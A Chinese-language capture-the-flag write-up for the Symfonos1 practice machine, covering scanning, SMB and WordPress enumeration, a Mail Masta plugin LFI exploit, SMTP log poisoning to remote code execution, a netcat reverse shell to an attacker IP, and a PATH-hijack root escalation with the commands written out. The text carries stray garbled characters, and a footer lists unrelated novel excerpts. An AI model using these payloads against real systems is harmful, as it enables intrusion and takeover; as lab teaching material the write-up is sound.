Symfonos1靶機:Hacking Writeup

Symfonos1 是 Symfonos 系列靶機的第一關(guān)陶衅。

目錄

1、掃描

  • Netdiscover
  • Nmap

2、枚舉

  • SMB 共享目錄
  • WPScan

3付魔、漏洞利用

  • 利用 WordPress 的 LFI 漏洞
  • 通過 SMTP 日志投毒使 LFI 漏洞來實現(xiàn) RCE

4、提權(quán)

  • 利用環(huán)境變量 PATH

Let's get it!


使用 netdiscover 命令來發(fā)現(xiàn)目標(biāo)主機,這里靶機的 IP192.168.166.201

  • netdiscover -i eth0
image.png

使用 nmap 對靶機進行端口掃描,發(fā)現(xiàn)開放了以下端口:22薇缅、2580攒磨、139泳桦、445

image.png

接著使用使用 enum4linux 對靶機進行網(wǎng)絡(luò)枚舉,發(fā)現(xiàn)靶機存在一個名為 helios 的用戶娩缰,以及兩個 Samba 共享目錄 /anonymous/helios

image.png

訪問 Samba 共享目錄:

image.png
image.png

先訪問 /anonymous 目錄蓬痒,因為該目錄無須輸入密碼即可訪問:

image.png

查看 attention.txt 文件的內(nèi)容:

image.png

上面提到幾個弱密碼,可用來嘗試進入 /helios 目錄,嘗試后發(fā)現(xiàn)弱密碼 qwerty 可進入 /helios 目錄:

image.png

發(fā)現(xiàn)兩個文件梧奢,research.txttodo.txt ,查看其內(nèi)容演痒,發(fā)現(xiàn) research.txt 沒啥用亲轨,todo.txt 中提到了一個目錄 /h3l105,這也許是 Web站點的路徑鸟顺,我們可以嘗試在 Web 中訪問惦蚊,于是訪問 http://192.168.166.201/h3l105/,發(fā)現(xiàn)是一個使用了 WordPress 搭建的站點:

image.png
image.png

對該站點使用 BurpSuite 抓包可以看到讯嫂,網(wǎng)站前端向服務(wù)器發(fā)請求的時候蹦锋,還會請求一個域名 symfonos.local,其實該域名是就是指向靶機的 IP欧芽,所以我們在攻擊機的 /etc/hosts 文件中加上該域名的解析記錄:

image.png

然后使用 WPScan 對其進行掃描莉掂,加上 -ep 參數(shù),枚舉以下該站點使用的 wordpress 插件:

image.png

發(fā)現(xiàn)使用了 mail-mastasite-editor 這兩個插件千扔,使用 searchsploit 搜索一下看有沒有相應(yīng)的 exp

image.png

可以看到 mail-masta 這個插件的 1.0 版本存在兩個漏洞憎妙,這里我們利用 LFI 漏洞,將 40290.txt 下載下來:

image.png

查看該文件曲楚,可看到該漏洞的 PoC 為:
http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

image.png

于是我們訪問:
http://192.168.166.201/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

可看到漏洞確實存在且可被利用:

image.png

因為前面端口掃描的時候厘唾,看到靶機還開放了 25 端口,該端口上運行的是 SMTP 郵件服務(wù)龙誊,所以下面我們通過 SMTP 日志投毒來使得 LFI 漏洞實現(xiàn) RCE抚垃。

訪問 http://192.168.166.201/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios 可看到 /var/mail/helios 文件,該郵件記錄的是 helios 用戶收到的郵件信息趟大。

于是我們可以使用 telnet 通過命令行向 helios 用戶發(fā)送郵件鹤树,在郵件中插入惡意的 php 代碼:

image.png

發(fā)送后,通過訪問 http://192.168.166.201/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&m=id 即可達到遠程代碼執(zhí)行的效果

image.png

于是护昧,用這種方式魂迄,使用 nc 命令,我們可以拿到一個反向 shell惋耙。

先監(jiān)聽本機 5555 端口:

image.png

訪問 http://192.168.166.201/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&m=nc%20-e%20/bin/bash%20192.168.166.176%205555

得到反向 shell:

image.png

為了提權(quán)捣炬,我們先通過 find 命令尋找有 sticky 位的程序文件:

  • find / -perm -u=s -type f 2>/dev/null
image.png

我們選擇其中的 /opt/statuscheck 程序,該文件是一個二進制文件绽榛,因此我們使用 strings 命令查看它的元數(shù)據(jù):

image.png

可以看到湿酸,該程序會去調(diào)用 curl 命令。因此我們可以通過自建一個 curl 命令灭美,并通過臨時配置環(huán)境變量 PATH推溃,使得當(dāng) /opt/statuscheck 程序執(zhí)行的時候,調(diào)用我自建的 curl 命令届腐,從而獲得一個擁有 root 權(quán)限的 shell铁坎。

依次執(zhí)行下面的命令:

cd /tmp
echo "/bin/sh" > curl
chmod 777 curl
export PATH=/tmp:$PATH
echo $PATH
/opt/statuscheck
image.png

這種提權(quán)的方式蜂奸,可閱讀 Linux Privilege Escalation Using PATH Variable

Hacking done.

image.png
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市硬萍,隨后出現(xiàn)的幾起案子扩所,更是在濱河造成了極大的恐慌,老刑警劉巖朴乖,帶你破解...
    沈念sama閱讀 222,681評論 6 517
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件祖屏,死亡現(xiàn)場離奇詭異,居然都是意外死亡买羞,警方通過查閱死者的電腦和手機袁勺,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 95,205評論 3 399
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來畜普,“玉大人期丰,你說我怎么就攤上這事∧叮” “怎么了咐汞?”我有些...
    開封第一講書人閱讀 169,421評論 0 362
  • 文/不壞的土叔 我叫張陵,是天一觀的道長儒鹿。 經(jīng)常有香客問我化撕,道長,這世上最難降的妖魔是什么约炎? 我笑而不...
    開封第一講書人閱讀 60,114評論 1 300
  • 正文 為了忘掉前任植阴,我火速辦了婚禮,結(jié)果婚禮上圾浅,老公的妹妹穿的比我還像新娘掠手。我一直安慰自己,他們只是感情好狸捕,可當(dāng)我...
    茶點故事閱讀 69,116評論 6 398
  • 文/花漫 我一把揭開白布喷鸽。 她就那樣靜靜地躺著,像睡著了一般灸拍。 火紅的嫁衣襯著肌膚如雪做祝。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 52,713評論 1 312
  • 那天鸡岗,我揣著相機與錄音混槐,去河邊找鬼。 笑死轩性,一個胖子當(dāng)著我的面吹牛声登,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播,決...
    沈念sama閱讀 41,170評論 3 422
  • 文/蒼蘭香墨 我猛地睜開眼悯嗓,長吁一口氣:“原來是場噩夢啊……” “哼件舵!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起绅作,我...
    開封第一講書人閱讀 40,116評論 0 277
  • 序言:老撾萬榮一對情侶失蹤芦圾,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后俄认,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 46,651評論 1 320
  • 正文 獨居荒郊野嶺守林人離奇死亡洪乍,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 38,714評論 3 342
  • 正文 我和宋清朗相戀三年眯杏,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片壳澳。...
    茶點故事閱讀 40,865評論 1 353
  • 序言:一個原本活蹦亂跳的男人離奇死亡岂贩,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出巷波,到底是詐尸還是另有隱情萎津,我是刑警寧澤,帶...
    沈念sama閱讀 36,527評論 5 351
  • 正文 年R本政府宣布抹镊,位于F島的核電站锉屈,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏垮耳。R本人自食惡果不足惜颈渊,卻給世界環(huán)境...
    茶點故事閱讀 42,211評論 3 336
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望终佛。 院中可真熱鬧俊嗽,春花似錦、人聲如沸铃彰。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,699評論 0 25
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽牙捉。三九已至竹揍,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間鹃共,已是汗流浹背鬼佣。 一陣腳步聲響...
    開封第一講書人閱讀 33,814評論 1 274
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留霜浴,地道東北人晶衷。 一個月前我還...
    沈念sama閱讀 49,299評論 3 379
  • 正文 我出身青樓,卻偏偏與公主長得像,于是被迫代替她去往敵國和親晌纫。 傳聞我的和親對象是個殘疾皇子税迷,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 45,870評論 2 361

推薦閱讀更多精彩內(nèi)容